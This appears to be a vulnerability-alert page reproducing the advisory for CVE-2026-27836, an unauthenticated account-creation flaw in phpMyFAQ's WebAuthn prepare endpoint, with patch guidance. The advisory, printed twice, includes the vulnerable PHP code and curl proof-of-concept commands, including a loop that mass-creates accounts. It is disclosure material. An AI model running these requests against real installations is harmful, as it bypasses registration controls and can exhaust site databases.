Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.5
phpMyFAQ Allows Unauthenticated User Account Creation
CVE-2026-27836
GHSA-w22q-m2fm-x9f4
Summary
Unauthenticated attackers can create unlimited user accounts, even if registration is disabled. This is a security risk because it allows anyone to create new accounts without verifying their identity. To fix this, update phpMyFAQ to the latest version, which includes a patch for this issue.
What to do
- Update thorsten phpmyfaq to version 4.0.18.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| thorsten | phpmyfaq | <= 4.0.18 | 4.0.18 |
| phpmyfaq | phpmyfaq | <= 4.0.18 | – |
Original title
phpMyFAQ Allows Unauthenticated Account Creation via WebAuthn Prepare Endpoint
Original description
### Summary
The WebAuthn prepare endpoint (`/api/webauthn/prepare`) creates new active user accounts without any authentication, CSRF protection, CAPTCHA, or configuration checks. This allows unauthenticated attackers to create unlimited user accounts even when registration is disabled.
### Details
**File:** `phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/WebAuthnController.php`, lines 63-79
```php
#[Route(path: 'webauthn/prepare', name: 'api.private.webauthn.prepare', methods: ['POST'])]
public function prepare(Request $request): JsonResponse
{
$data = json_decode($request->getContent(), ...);
$username = Filter::filterVar($data->username, FILTER_SANITIZE_SPECIAL_CHARS);
if (!$this->user->getUserByLogin($username, raiseError: false)) {
try {
$this->user->createUser($username);
$this->user->setStatus(status: 'active');
$this->user->setAuthSource(AuthenticationSourceType::AUTH_WEB_AUTHN->value);
$this->user->setUserData([
'display_name' => $username,
'email' => $username,
]);
```
The endpoint:
1. Accepts any POST request with a JSON `username` field
2. If the username doesn't exist, creates a new **active** user account
3. Does NOT check if WebAuthn support is enabled (`security.enableWebAuthnSupport`)
4. Does NOT check if registration is enabled (`security.enableRegistration`)
5. Does NOT verify CSRF tokens
6. Does NOT require captcha validation
7. Has no rate limiting
### PoC
```bash
# Create an account - no auth needed
curl -X POST https://TARGET/api/webauthn/prepare \
-H 'Content-Type: application/json' \
-d '{"username":"attacker_account"}'
# Mass account creation
for i in $(seq 1 1000); do
curl -s -X POST https://TARGET/api/webauthn/prepare \
-H 'Content-Type: application/json' \
-d "{\"username\":\"spam_user_$i"}" &
done
```
### Impact
- **Registration bypass:** Accounts created even when self-registration is disabled
- **Username squatting:** Reserve usernames before legitimate users
- **Database exhaustion:** Create millions of fake active accounts (DoS)
- **User enumeration:** Different responses for existing vs new usernames
- **Security control bypass:** WebAuthn config check is bypassed entirely
All phpMyFAQ installations with the WebAuthn controller routed (default) are affected, regardless of configuration settings.
The WebAuthn prepare endpoint (`/api/webauthn/prepare`) creates new active user accounts without any authentication, CSRF protection, CAPTCHA, or configuration checks. This allows unauthenticated attackers to create unlimited user accounts even when registration is disabled.
### Details
**File:** `phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/WebAuthnController.php`, lines 63-79
```php
#[Route(path: 'webauthn/prepare', name: 'api.private.webauthn.prepare', methods: ['POST'])]
public function prepare(Request $request): JsonResponse
{
$data = json_decode($request->getContent(), ...);
$username = Filter::filterVar($data->username, FILTER_SANITIZE_SPECIAL_CHARS);
if (!$this->user->getUserByLogin($username, raiseError: false)) {
try {
$this->user->createUser($username);
$this->user->setStatus(status: 'active');
$this->user->setAuthSource(AuthenticationSourceType::AUTH_WEB_AUTHN->value);
$this->user->setUserData([
'display_name' => $username,
'email' => $username,
]);
```
The endpoint:
1. Accepts any POST request with a JSON `username` field
2. If the username doesn't exist, creates a new **active** user account
3. Does NOT check if WebAuthn support is enabled (`security.enableWebAuthnSupport`)
4. Does NOT check if registration is enabled (`security.enableRegistration`)
5. Does NOT verify CSRF tokens
6. Does NOT require captcha validation
7. Has no rate limiting
### PoC
```bash
# Create an account - no auth needed
curl -X POST https://TARGET/api/webauthn/prepare \
-H 'Content-Type: application/json' \
-d '{"username":"attacker_account"}'
# Mass account creation
for i in $(seq 1 1000); do
curl -s -X POST https://TARGET/api/webauthn/prepare \
-H 'Content-Type: application/json' \
-d "{\"username\":\"spam_user_$i"}" &
done
```
### Impact
- **Registration bypass:** Accounts created even when self-registration is disabled
- **Username squatting:** Reserve usernames before legitimate users
- **Database exhaustion:** Create millions of fake active accounts (DoS)
- **User enumeration:** Different responses for existing vs new usernames
- **Security control bypass:** WebAuthn config check is bypassed entirely
All phpMyFAQ installations with the WebAuthn controller routed (default) are affected, regardless of configuration settings.
nvd CVSS3.1
7.5
Vulnerability type
CWE-862
Missing Authorization
Published: 27 Feb 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026